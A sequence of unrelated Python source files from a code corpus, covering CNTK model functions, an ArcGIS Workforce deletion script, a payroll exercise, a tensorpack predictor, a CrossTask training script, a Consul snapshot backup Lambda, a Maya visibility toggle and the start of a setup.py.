model_inputs_to_streams = self.argument_map(*streams)
# training session
ts = training_session(trainer, minibatch_source, minibatch_size, model_inputs_to_streams=model_inputs_to_streams,
progress_frequency=progress_frequency, max_samples=max_samples,
checkpoint_config=configs.checkpoint_configs[0], cv_config=configs.cv_configs[0], test_config=configs.test_configs[0])
ts.train()
res = Record(updates=collector.training_updates, epoch_summaries=collector.training_summaries) if len(collector.training_summaries) > 0 else \
Record(updates=[Record(loss=0, metric=0, samples=0)], epoch_summaries=[Record(loss=0, metric=0, samples=0)])
if configs.test_configs[0]:
res = res.updated_with(test_summary=collector.test_summaries[-1])
return res
def test(self, minibatch_source, minibatch_size=32, streams=None, model_inputs_to_streams=None, callbacks=None):
'''
Measures the performance of a model, given by its criterion function, in the form of
average metric value (or loss if model has only one output) on a set of data.
This is a convenience wrapper around :class:`cntk.eval.evaluator.Evaluator`.
Args:
minibatch_source (:class:`~cntk.io.MinibatchSource`): minibatch source for the test data
minibatch_size (:class:`~cntk.cntk_py.minibatch_size_schedule` or int): minibatch size for evaluation
streams (tuple): the streams of the minibatch_source in argument order
model_inputs_to_streams (dict): mapping between input variables and input streams
callbacks (progress writer or list of them): optionally, list of
progress writers from :mod:`cntk.logging` to automatically track training
progress.
Returns:
An object `test_summary` with `test_summary.metric` being the average metric, and `test_summary.samples` the number of labels in the test set.
'''
if minibatch_size is None:
raise ValueError("minibatch_size must not be None.")
# input map
if streams:
if model_inputs_to_streams:
raise ValueError("streams and model_inputs_to_streams are mutually exclusive.")
model_inputs_to_streams = self.argument_map(*streams)
# wrap the data if needed
from ..train.training_session import TrainingSession
minibatch_source, model_inputs_to_streams = TrainingSession._sanitize_minibatch_source(minibatch_source, model_inputs_to_streams, self, infinitely_repeat=False)
# use a progress tracker to capture the metric and count values
collector = Function._ProgressCollector()
# Evaluator instance
from ..eval.evaluator import Evaluator
outputs = self.outputs
output = outputs[0] if len(outputs) == 1 else outputs[1] # use metric if present, otherwise loss
# callbacks. Only ProgressWriter is allowed in test()
from ..cntk_py import ProgressWriter
if callbacks and any(not isinstance(cb, ProgressWriter) for cb in callbacks):
ValueError('callbacks list must only contain objects of type ProgressWriter')
progress_writers = callbacks or []
evaluator = Evaluator(output, progress_writers + [collector])
# evaluation loop
while True:
data = minibatch_source.next_minibatch(minibatch_size) # fetch minibatch
if not data:
break # until we hit the end
evaluator.test_minibatch({ input: data[si] for input, si in model_inputs_to_streams.items()})
evaluator.summarize_test_progress()
return collector.test_summaries[-1]
@typemap
def save(self, filename):
'''
Save this function graph into a model file using protobuf-based
serialization.
Use distributed.Communicator.is_main() to gate your call to save()
in distributed environment.
Args:
filename (str): model path
'''
return super(Function, self).save(filename)
@typemap
def restore(self, filename):
'''
Restore the models parameters (in-place) from a saved model file
Args:
filename (str): saved model path
Returns:
`None`: this method only has the side-effect of loading the model parameters from the file
'''
return super(Function, self).restore(filename)
@staticmethod
def register_udf_deserialize_callback(op_name, callback):
'''
Register a callback function to be invoked when deserializing a user-
defined function with the corresponding op name.
When loading a model, CNTK will try to automatically reconstruct any
(non-native) user-defined functions by invoking a static
:func:`~cntk.ops.functions.UserFunction.deserialize` method of the
corresponding UserFunction sub-class. This method allows to override
default UDF deserialization behavior by specifying a user- defined
function op name and the corresponding callback that should be invoked
instead of the ``deserialize`` method.
Args:
op_name (str): unique op name of the user-defined function.
callback (function): a function taking three arguments (a list of
inputs to the UserFunction, a string name, and a state dictionary
generated by the corresponding :func:`~cntk.ops.functions.UserFunction.serialize`
method) and returns an instance of the user-defined function.
'''
if op_name in Function._udf_callback_map:
raise ValueError("A callback for the UserFunction with op name {}"
" has already been registered.".format(op_name));
Function._udf_callback_map[op_name] = callback
@staticmethod
@typemap
def load(model, device=None):
'''
Load the ``model``, that has been saved using :func:`~cntk.ops.functions.Function.save`.
Args:
model (str, bytes or bytearray): either a file path of a model file or a byte buffer
containing the binary representation of a model.
device (:class:`~cntk.device.DeviceDescriptor`, defaults to the current globally default device):
specifies the device to allocate the model on.
Returns:
root node
'''
if not device:
device = DeviceDescriptor.use_default_device()
is_buffer = is_byte_buffer(model)
is_file = False
if not is_buffer:
try:
is_file = path.exists(model)
except:
pass
if is_buffer:
return cntk_py.Function.load_from_buffer(model, device)
if is_file:
return cntk_py.Function.load(model, device)
raise ValueError('Cannot load a model that is neither a file nor a byte buffer.')
@staticmethod
def with_signature(*args, **kwargs):
'''
Decorator for defining a @Function with a given signature. Same as @Function followed by @Signature.
Example:
>>> from cntk.layers.typing import *
>>> @Function.with_signature(Tensor[13])
... def f(x):
... return x * x
>>> print(f)
ElementTimes(x: Tensor[13]) -> Tensor[13]
>>> # which is equivalent to this:
>>> @Function
... @Signature(Tensor[13])
... def f(x):
... return x * x
>>> print(f)
ElementTimes(x: Tensor[13]) -> Tensor[13]
'''
def decorator(f):
from cntk.layers.typing import Signature
f = Signature(*args, **kwargs)(f)
f = Function(f)
return f
return decorator
def BlockFunction(op_name, name):
'''
Decorator for defining a @Function as a BlockFunction. Same as @Function, but wrap the content into an :func:`~cntk.ops.as_block`.
'''
return lambda f: Function(f, make_block=True, op_name=op_name, name=name)
@typemap
def register_native_user_function(op_id, module_name, factory_method_name):
'''
Registers a native user-defined Function that can be subsequently instantiated
using the 'native_user_function' method.
Args:
op_id (str): Unique id of the native user-defined Function to register.
This id must be unique and an error will be reported if it matches
the 'op_id' specified for any other registered native user-defined Function.
module_name (str): Name of the module containing the factory method for creating
instances of the native user-defined Function being registered. This is typically
the name of a DLL/so which exports a factory method for creating instances of the
native user-defined Function.
factory_method_name (str): Name of the factory method for creating instances of the native
user-defined Function being registered. This method must be an exported method of the
specified module.
'''
return cntk_py.Function_register_native_user_function(op_id, module_name, factory_method_name)
@typemap
def native_user_function(op_id, operands, attributes=None, user_function_instance_name=''):
'''
Creates an instance of a user-defined Function previously registered using the
'register_native_user_function' method.
Args:
op_id (str): Id of the native user-defined Function to instantiate.
This must be the id that was used when registering the native user-function
with the 'register_native_user_function' method.
operands (list): input operands of the new instance of the native user-defined Function.
user_function_instance_name (str): Name of the instance of the created native
user-defined Function.
Returns:
:class:`~cntk.ops.functions.Function`
'''
if attributes is None:
attributes = {}
attributes = _py_dict_to_cntk_dict(attributes)
return cntk_py.Function_native_user_function(op_id, operands, attributes, user_function_instance_name)
@typemap
def load_model(model, device=None):
'''
Alias for :func:`~cntk.ops.functions.Function.load`.
'''
return Function.load(model, device)
class UserFunction(Function):
'''
Base class of all user extension functions.
If it has only one output, one can invoke Variable methods on it, which it
will relay to its only output.
Args:
inputs (list): inputs to this function
as_numpy (bool, optional): whether the data should be automatically
converted from and to NumPy. Defaults to True. Specifying this as
`False` passes the data as CNTK Value objects.
name (str): name of this function
'''
def __init__(self, inputs, as_numpy=True, name=''):
super(UserFunction, self).__init__(inputs, name)
self.set_native(False)
self.as_numpy = as_numpy
# Since the state will frequently not be used, we cache the None-state
# to speed up.
self._none_state = cntk_py.UserBackPropState.create(self, cpu(), None)
# Memory management for user defined functions has to be controlled by
# the C++ side. For more information:
# http://www.swig.org/Doc3.0/Python.html#Python_nn35
self.__disown__()
def _get_none_state(self, device=cpu()):
if self._none_state.device() != device:
self._none_state = cntk_py.UserBackPropState.create(self, device, None)
return self._none_state
def _forward(self, arguments, outputs, device=None, outputs_to_retain=None):
'''
Computes the values of speficied variables in ``outputs``, using values
provided in ``arguments`` that correspond to each input `Variable` of
the function whose ``is_input`` is `True`.
This function calls :func:`forward`, which is to be implemented by the
user.
Args:
arguments (tuple): Value objects of the Function's input
outputs (iterable): outputs to fetch values for.
device (:class:`~cntk.device.DeviceDescriptor`, default `None`): the device
descriptor that contains the type and id of the device on which the
computation is. If `None`, the default device is used.
Returns:
A BackPropState instance, which is used by :func:`backward`.
'''
if self.as_numpy:
inputs = self.inputs
arguments = tuple(_value_as_sequence_or_array(v, inputs[i]) for i, v in enumerate(arguments))
map_if_possible(outputs)
map_if_possible(outputs_to_retain)
args = arguments if len(arguments)>1 else arguments[0]
if len(outputs) <= 1:
state, result = self.forward(args, device, outputs_to_retain)
for k in outputs:
outputs[k] = result
else:
state = self.forward(args, outputs, device, outputs_to_retain)
if isinstance(state, cntk_py.BackPropState):
self._state_wrapped = False
else:
self._state_wrapped = True
if state is None:
state = self._get_none_state(device)
else:
state = cntk_py.UserBackPropState.create(self, device, state)
if self.as_numpy:
for k,v in outputs.items():
if v is None:
raise ValueError('not all outputs have been provided')
# FIXME: seq_starts
outputs[k] = sanitize_batch(k, v, None, device)
return state, outputs
def _backward(self, state, root_gradients, variables):
'''
Backpropagates supplied ``root_gradients`` for one or more of the output
variables of the Function, to calculate gradients with respect to
``variables``. Formally, multiplies the values of ``root_gradients`` by
the Jacobian of the Function and returns the subset of the output that
corresponds to ``variables``.
This function calls :func:`backward`, which is to be implemented by the
user.
Args:
state (BackPropState): state obtained from a previous call to the
func:`cntk.ops.Function.forward` method on this Function for the
computation that this gradient backpropagation corresponds to.
root_gradients (dict): the gradients that will be backpropagated
variables (set): a list of input variables with respect to which
the gradients have to be computed.
Returns:
dict: mapping of ``variables`` to NumPy arrays
'''
device = state.device()
if self.as_numpy:
map_if_possible(root_gradients)
for v in root_gradients:
if v.needs_gradient:
root_gradients[v] = _value_as_sequence_or_array(root_gradients[v], v)
if not isinstance(state, cntk_py.BackPropState):
raise ValueError('state must be of type BackPropState')
if self._state_wrapped:
state = cntk_py.UserBackPropState.data(state)
map_if_possible(variables)
if len(root_gradients) == 1:
for rg in root_gradients.values():
break
root_gradients = rg
if len(self.inputs) > 1:
self.backward(state, root_gradients, variables)
else:
result = self.backward(state, root_gradients)
for k in variables:
variables[k] = result
if self.as_numpy:
for k, v in variables.items():
if v is not None:
variables[k] = sanitize_batch(k, v, None, device)
def _infer_outputs(self, outputs):
outputs.extend(self.infer_outputs())
def infer_outputs(self):
'''
Returns a list of all output variables this user-defined function
outputs.
Output variables are created by
:meth:`~cntk.ops.output_variable`.
'''
raise NotImplementedError('infer_outputs has to be overwritten')
def clone(self, cloned_inputs):
'''
Creates a clone of this user-defined function.
It assumes that the constructor signature of the user's implementation
of the user function takes the inputs as individual arguments followed
by the operator name. If the signature is different, then this method
needs to be overriden.
Args:
cloned_inputs: list of cloned inputs to the new user-defined
Function clone to be created.
Returns:
A cloned instance of this user-defined function.
'''
return self.__class__(*cloned_inputs, name=self.name)
def _serialize_impl(self):
dictionary = _serialize(self)
return _py_dict_to_cntk_dict(dictionary)
@staticmethod
def deserialize(inputs, name, state):
'''
A stub deserialize method for illustration purposes. User-defined functions
need to provide their own implementation in order for CNTK to be able to
reconstruct them when loading a model.
Args:
inputs (list): a list of inputs to the function
name (str): name of this function
state (dict): a state dictionary generated by the corresponding
:func:`~cntk.ops.functions.UserFunction.serialize` method.
Returns:
An instance of the user-defined function.
'''
raise NotImplementedError('a stub method for illustration purposes.')
@property
def op_name(self):
'''
Unique operation name of this user-defined function.
This property defaults to '<module>.<class>', but can be overridden.
'''
return self.__class__._op_name()
def serialize(self):
'''
Generates a dictionary that captures the state of this user-defined function.
This method must be overridden, if a user function has any state that needs
to be preserved in the model dictionary.
'''
return {}
@classmethod
def _op_name(cls):
return cls.__module__ + '.' + cls.__name__
|
the-stack_0_6164 | # -*- coding: UTF-8 -*-
"""
Copyright 2018 Esri
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This sample deletes assignments from a workforce project based on the supplied query
"""
import argparse
import logging
import logging.handlers
import traceback
import sys
from arcgis.apps import workforce
from arcgis.gis import GIS
def main(arguments):
# initialize logging
formatter = logging.Formatter("[%(asctime)s] [%(filename)30s:%(lineno)4s - %(funcName)30s()]\
[%(threadName)5s] [%(name)10.10s] [%(levelname)8s] %(message)s")
# Grab the root logger
logger = logging.getLogger()
# Set the root logger logging level (DEBUG, INFO, WARNING, ERROR, CRITICAL)
logger.setLevel(logging.DEBUG)
# Create a handler to print to the console
sh = logging.StreamHandler(sys.stdout)
sh.setFormatter(formatter)
sh.setLevel(logging.INFO)
# Create a handler to log to the specified file
if arguments.log_file:
rh = logging.handlers.RotatingFileHandler(arguments.log_file, mode='a', maxBytes=10485760)
rh.setFormatter(formatter)
rh.setLevel(logging.DEBUG)
logger.addHandler(rh)
# Add the handlers to the root logger
logger.addHandler(sh)
# Create the GIS
logger.info("Authenticating...")
# First step is to get authenticate and get a valid token
gis = GIS(arguments.org_url,
username=arguments.username,
password=arguments.password,
verify_cert=not arguments.skip_ssl_verification)
# Get the project
item = gis.content.get(arguments.project_id)
project = workforce.Project(item)
# Call delete features on the layer
logger.info("Deleting assignments...")
project.assignments_layer.delete_features(where=arguments.where)
# Note: could also use the following if validation of assignments is important:
# project.assignments.batch_delete(project.assignments.search(where=arguments.where))
logger.info("Completed")
if __name__ == "__main__":
# Get all of the commandline arguments
parser = argparse.ArgumentParser("Delete Assignments to Workforce Project")
parser.add_argument('-u', dest='username', help="The username to authenticate with", required=True)
parser.add_argument('-p', dest='password', help="The password to authenticate with", required=True)
parser.add_argument('-org', dest='org_url', help="The url of the org/portal to use", required=True)
# Parameters for workforce
parser.add_argument('-project-id', dest='project_id', help="The id of the project to delete assignments from",
required=True)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-where', dest='where', help="The where clause to use", default="1=1")
parser.add_argument('-log-file', dest="log_file", help="The file to log to")
parser.add_argument('--skip-ssl-verification', dest='skip_ssl_verification', action='store_true',
help="Verify the SSL Certificate of the server")
args = parser.parse_args()
try:
main(args)
except Exception as e:
logging.getLogger().critical("Exception detected, script exiting")
logging.getLogger().critical(e)
logging.getLogger().critical(traceback.format_exc().replace("\n", " | "))
|
the-stack_0_6165 | # Andrew Riker
# CS1400 - LW2 XL
# Assignment #04
# user enters name of employee
name = input("Enter employee's name: ")
# user enters number of hours worked in a week
numberOfHours = eval(input("Enter number of hours worked in a week: "))
# user enters hourly pay
payRate = eval(input("Enter hourly pay rate: "))
# user enters federal tax rate
federalTaxRate = eval(input("Enter federal tax withholding rate (ex. 0.12): "))
# user enters state tax rate
stateTaxRate = eval(input("Enter state tax withholding rate (ex. 0.06): "))
# get federal percentage
federalPercent = str(format(federalTaxRate, "2.1%"))
# get state percentage
statePercent = str(format(stateTaxRate, "1.1%"))
# calculate gross pay
grossPay = numberOfHours * payRate
# calculate federal withholding
federalWithhold = grossPay * federalTaxRate
# calculate state withholding
stateWithhold = grossPay * stateTaxRate
# total deductions
totalDeductions = stateWithhold + federalWithhold
# net pay
netPay = grossPay - totalDeductions
# spec for format
specString = ">30s"
specFloat = "10.2f"
# name + pay information
msg = "\n\t" + name.upper() + " pay information".upper()
# pay
msg += "\n" + str(format("Pay", ">25s"))
msg += "\n"
# hours worked
msg += format("Hours Worked: ", specString) + str(format(numberOfHours, "10.0f"))
msg += "\n"
# Pay rate
msg += format("Pay Rate: $", specString) + str(format(payRate, specFloat))
msg += "\n"
# gross pay
msg += format("Gross Pay: $", specString) + str(format(grossPay, specFloat))
msg += "\n"
# print Deductions
msg += "\n" + str(format("Deductions", ">25s"))
msg += "\n"
# Federal Withholding
msg += format("Federal Withholding (" + federalPercent + "): $", specString) + str(format(federalWithhold, specFloat))
msg += "\n"
# state withholding
msg += format("State Withholding (" + statePercent + "): $", specString) + str(format(stateWithhold, specFloat))
msg += "\n"
# Total deductions
msg += format("Total Deduction: $", specString) + str(format(totalDeductions, specFloat))
msg += "\n"
# net pay
msg += "\n"
msg += format("Net Pay: $", specString) + str(format(netPay, specFloat))
# print information
print(msg)
|
the-stack_0_6166 | # -*- coding: utf-8 -*-
# File: base.py
from abc import abstractmethod, ABCMeta
import tensorflow as tf
import six
from ..tfutils.common import get_tensors_by_names
from ..tfutils.tower import PredictTowerContext
from ..input_source import PlaceholderInput
__all__ = ['PredictorBase', 'AsyncPredictorBase',
'OnlinePredictor', 'OfflinePredictor',
]
@six.add_metaclass(ABCMeta)
class PredictorBase(object):
"""
Base class for all predictors.
Attributes:
return_input (bool): whether the call will also return (inputs, outputs)
or just outputs
"""
def __call__(self, *dp):
"""
Call the predictor on some inputs.
Example:
When you have a predictor defined with two inputs, call it with:
.. code-block:: python
predictor(e1, e2)
"""
output = self._do_call(dp)
if self.return_input:
return (dp, output)
else:
return output
@abstractmethod
def _do_call(self, dp):
"""
Args:
dp: input datapoint. must have the same length as input_names
Returns:
output as defined by the config
"""
class AsyncPredictorBase(PredictorBase):
""" Base class for all async predictors. """
@abstractmethod
def put_task(self, dp, callback=None):
"""
Args:
dp (list): A datapoint as inputs. It could be either batched or not
batched depending on the predictor implementation).
callback: a thread-safe callback to get called with
either outputs or (inputs, outputs).
Returns:
concurrent.futures.Future: a Future of results
"""
@abstractmethod
def start(self):
""" Start workers """
def _do_call(self, dp):
assert six.PY3, "With Python2, sync methods not available for async predictor"
fut = self.put_task(dp)
# in Tornado, Future.result() doesn't wait
return fut.result()
class OnlinePredictor(PredictorBase):
""" A predictor which directly use an existing session and given tensors.
"""
ACCEPT_OPTIONS = False
""" See Session.make_callable """
sess = None
"""
The tf.Session object associated with this predictor.
"""
def __init__(self, input_tensors, output_tensors,
return_input=False, sess=None):
"""
Args:
input_tensors (list): list of names.
output_tensors (list): list of names.
return_input (bool): same as :attr:`PredictorBase.return_input`.
sess (tf.Session): the session this predictor runs in. If None,
will use the default session at the first call.
Note that in TensorFlow, default session is thread-local.
"""
self.return_input = return_input
self.input_tensors = input_tensors
self.output_tensors = output_tensors
self.sess = sess
if sess is not None:
self._callable = sess.make_callable(
fetches=output_tensors,
feed_list=input_tensors,
accept_options=self.ACCEPT_OPTIONS)
else:
self._callable = None
def _do_call(self, dp):
assert len(dp) == len(self.input_tensors), \
"{} != {}".format(len(dp), len(self.input_tensors))
if self.sess is None:
self.sess = tf.get_default_session()
assert self.sess is not None, "Predictor isn't called under a default session!"
if self._callable is None:
self._callable = self.sess.make_callable(
fetches=self.output_tensors,
feed_list=self.input_tensors,
accept_options=self.ACCEPT_OPTIONS)
# run_metadata = tf.RunMetadata()
# options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
return self._callable(*dp)
class OfflinePredictor(OnlinePredictor):
""" A predictor built from a given config.
A single-tower model will be built without any prefix. """
def __init__(self, config):
"""
Args:
config (PredictConfig): the config to use.
"""
self.graph = config._maybe_create_graph()
with self.graph.as_default():
input = PlaceholderInput()
input.setup(config.inputs_desc)
with PredictTowerContext(''):
config.tower_func(*input.get_input_tensors())
input_tensors = get_tensors_by_names(config.input_names)
output_tensors = get_tensors_by_names(config.output_names)
all_saver = tf.train.Saver() # Create the Saver object to save the Checkpoints
config.session_init._setup_graph()
sess = config.session_creator.create_session()
config.session_init._run_init(sess)
all_saver.save(sess, 'SE-ResNet50-ckpt/se-resnet50.ckpt') # Save the Checkpoints in the SENet-ckpt folder
writer = tf.summary.FileWriter('./tensorboard', self.graph) # Output the Tensorboard in the tensorboard folder
writer.close()
super(OfflinePredictor, self).__init__(
input_tensors, output_tensors, config.return_input, sess)
|
the-stack_0_6167 | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from __future__ import print_function
from model import Model
from data import *
from args import parse_args
from dp import dp
import torch as th
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import pickle
#th.cuda.set_device(1)
class Loss(nn.Module):
def __init__(self, lambd):
super(Loss, self).__init__()
self.lambd = lambd
self.lsm = nn.LogSoftmax(dim=1)
def forward(self, O, Y, C):
return (Y*(self.lambd * C - self.lsm(O))).mean(dim=0).sum()
def uniform_assignment(T,K):
stepsize = float(T) / K
y = th.zeros(T,K)
for k in range(K):
t = round(stepsize*(k+0.5))
y[t,k] = 1
return y
def get_recalls(Y_true, Y_pred):
step_match = {task: 0 for task in Y_true.keys()}
step_total = {task: 0 for task in Y_true.keys()}
for task,ys_true in Y_true.items():
ys_pred = Y_pred[task]
for vid in set(ys_pred.keys()).intersection(set(ys_true.keys())):
y_true = ys_true[vid]
y_pred = ys_pred[vid]
step_total[task] += (y_true.sum(axis=0)>0).sum()
step_match[task] += (y_true*y_pred).sum()
recalls = {task: step_match[task] / n for task,n in step_total.items()}
return recalls
args = parse_args()
task_vids = get_vids(args.video_csv_path)
val_vids = get_vids(args.val_csv_path)
task_vids = {task: [vid for vid in vids if task not in val_vids or vid not in val_vids[task]] for task,vids in task_vids.items()}
primary_info = read_task_info(args.primary_path)
test_tasks = set(primary_info['steps'].keys())
if args.use_related:
related_info = read_task_info(args.related_path)
task_steps = {**primary_info['steps'], **related_info['steps']}
n_steps = {**primary_info['n_steps'], **related_info['n_steps']}
else:
task_steps = primary_info['steps']
n_steps = primary_info['n_steps']
all_tasks = set(n_steps.keys())
task_vids = {task: vids for task,vids in task_vids.items() if task in all_tasks}
A, M = get_A(task_steps, share=args.share)
if args.use_gpu:
A = {task: a.cuda() for task, a in A.items()}
train_vids, test_vids = random_split(task_vids, test_tasks, args.n_train)
trainset = CrossTaskDataset(train_vids, n_steps, args.features_path, args.constraints_path)
trainloader = DataLoader(trainset,
batch_size = args.batch_size,
num_workers = args.num_workers,
shuffle = True,
drop_last = True,
collate_fn = lambda batch: batch,
)
testset = CrossTaskDataset(test_vids, n_steps, args.features_path, args.constraints_path)
testloader = DataLoader(testset,
batch_size = args.batch_size,
num_workers = args.num_workers,
shuffle = False,
drop_last = False,
collate_fn = lambda batch: batch,
)
import pdb; pdb.set_trace()
net = Model(args.d, M, A, args.q).cuda() if args.use_gpu else Model(args.d, M, A, args.q)
optimizer = optim.Adam(net.parameters(), lr=args.lr)
loss_fn = Loss(args.lambd)
# initialize with uniform step assignment
Y = {}
for batch in trainloader:
for sample in batch:
task = sample['task']
vid = sample['vid']
K = n_steps[task]
T = sample['X'].shape[0]
if task not in Y:
Y[task] = {}
y = uniform_assignment(T,K)
Y[task][vid] = y.cuda() if args.use_gpu else y
def save_stuff(Y_pred, Y_true, outputs):
pickle.dump(Y_pred, open('Y_pred.pkl', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(Y_true, open('Y_true.pkl', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(outputs, open('outputs.pkl', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
def train_epoch(pretrain=False):
cumloss = 0.
for batch in trainloader:
for sample in batch:
vid = sample['vid']
task = sample['task']
X = sample['X'].cuda() if args.use_gpu else sample['X']
C = sample['C'].cuda() if args.use_gpu else sample['C']
if pretrain:
# picking random assignment, that satisfies the constraints
O = np.random.rand(X.size()[0],n_steps[task]) + C.cpu().numpy()
y = np.zeros(Y[task][vid].shape,dtype=np.float32)
dp(y,O.astype(np.float32),exactly_one=True)
Y[task][vid].data = th.tensor(y,dtype=th.float).cuda() if args.use_gpu else th.tensor(y,dtype=th.float)
else:
# updating assignment
O = net(X, task)
# y = th.tensor(Y[task][vid].data,requires_grad=True)
y = Y[task][vid].requires_grad_(True)
loss = loss_fn(O, y, C)
param_grads = th.autograd.grad(loss, net.parameters(), create_graph=True, only_inputs=True)
F = loss
for g in param_grads:
F -= 0.5*args.lr*(g**2).sum()
Y_grad = th.autograd.grad(F,[y], only_inputs=True)
y = np.zeros(Y[task][vid].size(),dtype=np.float32)
dp(y,Y_grad[0].cpu().numpy())
Y[task][vid].requires_grad_(False)
Y[task][vid].data = th.tensor(y,dtype=th.float).cuda() if args.use_gpu else th.tensor(y,dtype=th.float)
# updating model parameters
O = net(X, task)
loss = loss_fn(O,Y[task][vid],C)
loss.backward()
cumloss += loss.item()
optimizer.step()
net.zero_grad()
return cumloss
def eval():
net.eval()
lsm = nn.LogSoftmax(dim=1)
Y_pred = {}
Y_true = {}
outputs = {}
for batch in testloader:
for sample in batch:
vid = sample['vid']
task = sample['task']
X = sample['X'].cuda() if args.use_gpu else sample['X']
O = lsm(net(X, task))
if task not in outputs:
outputs[task] = {}
outputs[task][vid] = O.detach().cpu().numpy()
y = np.zeros(O.size(),dtype=np.float32)
dp(y,-O.detach().cpu().numpy())
if task not in Y_pred:
Y_pred[task] = {}
Y_pred[task][vid] = y
annot_path = os.path.join(args.annotation_path,task+'_'+vid+'.csv')
if os.path.exists(annot_path):
if task not in Y_true:
Y_true[task] = {}
Y_true[task][vid] = read_assignment(*y.shape, annot_path)
recalls = get_recalls(Y_true, Y_pred)
for task,rec in recalls.items():
print('Task {0}. Recall = {1:0.3f}'.format(task, rec))
avg_recall = np.mean(list(recalls.values()))
print ('Recall: {0:0.3f}'.format(avg_recall))
save_stuff(Y_pred, Y_true, outputs)
net.train()
if args.model_load_path:
print ('Loading...')
net.load_state_dict(th.load(args.model_load_path))
else:
print ('Training...')
net.train()
for epoch in range(args.pretrain_epochs):
cumloss = train_epoch(pretrain=True)
print ('Epoch {0}. Loss={1:0.2f}'.format(epoch+1, cumloss))
for epoch in range(args.epochs):
cumloss = train_epoch()
print ('Epoch {0}. Loss={1:0.2f}'.format(args.pretrain_epochs+epoch+1, cumloss))
if args.model_save_path:
th.save(net.state_dict(), args.model_save_path)
print ('Evaluating...')
eval()
|
the-stack_0_6168 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import itertools
import json
import os
import shutil
import ssl
from datetime import datetime
from urllib.error import HTTPError
from urllib.request import Request, urlopen
import boto3
from botocore.exceptions import NoCredentialsError
FULL_PATH = "/tmp/"
CHUNK_NAME_PREFIX = "snapshot_chunk_"
CHUNK_SIZE = 4000
def split_chunks(file_name, key, encryption_context):
"""
:param file_name: (str) File name to split
:param encryption_context: (dict) encryption context
:return: (dict) with the token
"""
chunk_dir = datetime.now().strftime("%Y%m%d")
if os.path.isdir(FULL_PATH + chunk_dir):
shutil.rmtree(FULL_PATH + chunk_dir)
os.mkdir(FULL_PATH + chunk_dir)
client = boto3.client("kms")
with open(FULL_PATH + file_name, 'rb') as infile:
for i in itertools.count(0):
chunk = infile.read(CHUNK_SIZE)
if not chunk: break
chunk_name = CHUNK_NAME_PREFIX + str(i)
response = client.encrypt(
KeyId=key,
Plaintext=chunk,
EncryptionContext=encryption_context
)
with open(FULL_PATH + chunk_dir + "/" + chunk_name, 'wb') as outfile:
outfile.write(response["CiphertextBlob"])
return chunk_dir
def get_token(bucket, path, encryption_context):
"""
:param bucket: (str) Configuration Bucket
:param path: (str) Path to encrypted configuration file
:param encryption_context: (dict) encryption context
:return: (bytes) Consul Token
"""
client = boto3.resource("s3")
client.Bucket(bucket).download_file(path, FULL_PATH + 'secrets.enc')
client = boto3.client("kms")
with open(FULL_PATH + "secrets.enc", "rb") as file:
response = client.decrypt(CiphertextBlob=file.read(),
EncryptionContext=encryption_context
)
return json.loads(response["Plaintext"])
def generate_file_name(prefix="snapshot"):
"""
Generates file name bases
:param prefix: (str) Value to prefix the filename. Defaults to snapshot
:return: (str) File name with the pattern 'prefix_YYYYmmdd'
"""
now = datetime.now()
return prefix + "_" + now.strftime("%Y%m%d")
def download_snapshot(url, headers={}):
"""
:param url: (str) Url to query
:param headers: (dict) Headers to add to query
:return: (str) In case of success 'file_name'.
(NoneType) In case of failure 'None'
"""
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
request = Request(url)
for key in headers:
request.add_header(key, headers[key])
file_name = generate_file_name()
# Download the file from `url` and save it locally under `file_name`:
try:
with urlopen(request, context=ssl_context) as response, open(os.path.join(FULL_PATH + generate_file_name()),
'wb') as out_file:
data = response.read()
out_file.write(data)
except HTTPError as error:
print("Snapshot Failed: " + error.reason)
raise Exception("Backup Failed.")
except PermissionError as error:
print("Snapshot Failed: Write " + error.strerror)
raise Exception("Backup Failed.")
return file_name
def upload_chunks(chunk_dir, bucket_path, bucket):
"""
:param file_name: (str) File to upload
:param bucket: (str) Destination S3 Bucket
:return: (dict) Response
"""
client = boto3.client("s3")
try:
chunks = os.listdir(FULL_PATH + chunk_dir)
for chunk in chunks:
data = open(FULL_PATH + chunk_dir + "/" + chunk, 'rb')
response = client.put_object(Key=bucket_path + "/" + chunk_dir + "/" + chunk, Body=data, Bucket=bucket)
except NoCredentialsError:
print("Upload error: Authentication failed")
raise Exception("Backup Failed.")
except FileNotFoundError as error:
print("Upload error: " + error.strerror)
raise Exception("Backup Failed.")
return response
def aws_lambda_handler(*args, **kwargs):
"""
Main handler for AWS
"""
config_bucket = os.getenv("CONFIG_BUCKET")
config_path = os.getenv("CONFIG_PATH")
backup_bucket = os.getenv("BACKUP_BUCKET")
backup_path = os.getenv("BACKUP_PATH")
url = os.getenv("URL")
key = os.getenv("KEY")
print("Start execution")
config = get_token(config_bucket, config_path)
headers = {"X-Consul-Token": config["token"]}
print("Download Snapshot")
file_name = download_snapshot(url, headers)
chunk_dir = split_chunks(file_name, key)
print("Upload chunks to s3")
upload_chunks(chunk_dir, backup_path, backup_bucket)
print("Execution Successful")
#
# For Local Testing
#
def main():
split_chunks()
if __name__ == '__main__':
main()
|
the-stack_0_6170 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author : Masahiro Ohmomo
# DCC : Maya
# Version : 2013 - Latest
# Recommend: 2013
#
# Description.
# In this script, you can toggle the visibility of objects .
#
# Run command.
# import toggle_visibility
# toggle_visibility.main()
#
from maya import cmds
def main():
selected = cmds.ls(sl=True)
if selected:
for sel in selected:
b_v = False if cmds.getAttr('%s.v'%sel) else True
cmds.setAttr('%s.v'%sel, b_v) |
the-stack_0_6171 | # encoding: utf-8
from setuptools import setup, find_packages
import os, re, ast
# parse version from locust/__init__.py
_version_re = re.compile(r'__version__\s+=\s+(.*)')
